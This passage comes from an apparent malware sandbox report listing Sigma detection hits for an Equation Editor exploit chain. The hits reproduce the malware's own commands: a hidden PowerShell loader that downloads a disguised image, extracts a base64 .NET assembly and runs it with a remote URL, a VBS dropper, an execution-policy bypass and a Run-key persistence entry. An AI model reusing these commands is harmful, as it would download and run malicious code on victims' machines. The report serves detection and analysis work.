foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs

                      System Summary

                      barindex
                      Sigma detected: Base64 Encoded PowerShell Command Detected
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Sigma detected: Equation Editor Network Connection
                      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 152, Protocol: tcp, SourceIp: 107.172.31.6, SourceIsIpv6: false, SourcePort: 80
                      Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs
                      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Sigma detected: Script Initiated Connection to Non-Local Network
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                      Sigma detected: Suspicious Microsoft Office Child Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , ProcessId: 3148, ProcessName: wscript.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , ProcessId: 3148, ProcessName: wscript.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\antre.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3544, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Path
                      Sigma detected: Script Initiated Connection
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                      Sigma detected: Suspicious Copy From or To System Directory
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3544, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs", ProcessId: 3752, ProcessName: cmd.exe
                      Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly 